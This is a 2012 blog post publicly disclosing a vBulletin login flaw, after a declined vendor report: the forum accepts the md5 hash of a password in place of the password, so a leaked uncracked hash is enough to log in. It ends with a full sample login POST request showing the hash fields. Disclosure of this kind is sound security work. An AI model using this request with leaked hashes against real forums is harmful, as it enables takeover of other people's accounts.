Friday, November 16, 2012

Old Working Exploits - or how you can log in to vbulletin forums with a user's uncracked hash

This is an issue I reported way back in 12/11/10 (reference SID-1046901-fc4373fb) and they declined to recognize it as a bug, so I'll post it for the benefit of the public.

It requires an uncracked md5 hash of a user's password on vBulletin forums.  When you log in, it doesn't actually transmit the password in plain text - it transmits the md5 hash of the password.  That's great! So any forum software running on http won't be nearly as vulnerable to sniffing plaintext passwords.  There's a problem, though:

md5 is commonly used as a password hashing algorithm, and hacked websites out there commonly have databases full of these accounts.  Typically, md5sum hashed passwords can be cracked 40-50 percent of the time.  Hackers use a lot of password-reuse attacks and the fact that you can pass along a hash instead of the cracked password means that that if you're part of the 50-60 percent of users with an uncrackable password, any accounts you have on a VBulletin forum aren't safe, if you've reused your passwords.  The issue can be mitigated by updating the password sending method to anything that an attacker can't use a known md5sum to log in with.

It's an edge case for sure, but if you're in the business of mass hacking accounts, then perhaps this edge case can net you that many more victims.

Here's an example login request that would be produced from any of the latest VB forums:

username: abcd
password: aaaa
hash: 74b87337454200d4d33f80c4663dc5e5 = aaaa


POST /login.php?do=login HTTP/1.1
Host: forums.forum.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Proxy-Connection: keep-alive
Referer: http://forums.forum.com/
Cookie: bbsessionhash=bbd4f543da0af78506ebe3b185368240; bblastvisit=1353135560; bblastactivity=0; AAJSID=balancer.www1
Content-Type: application/x-www-form-urlencoded
Content-Length: 185

vb_login_username=abcd&vb_login_password=&s=&securitytoken=guest&do=login&vb_login_md5password=74b87337454200d4d33f80c4663dc5e5&vb_login_md5password_utf=74b87337454200d4d33f80c4663dc5e5

No comments:

Post a Comment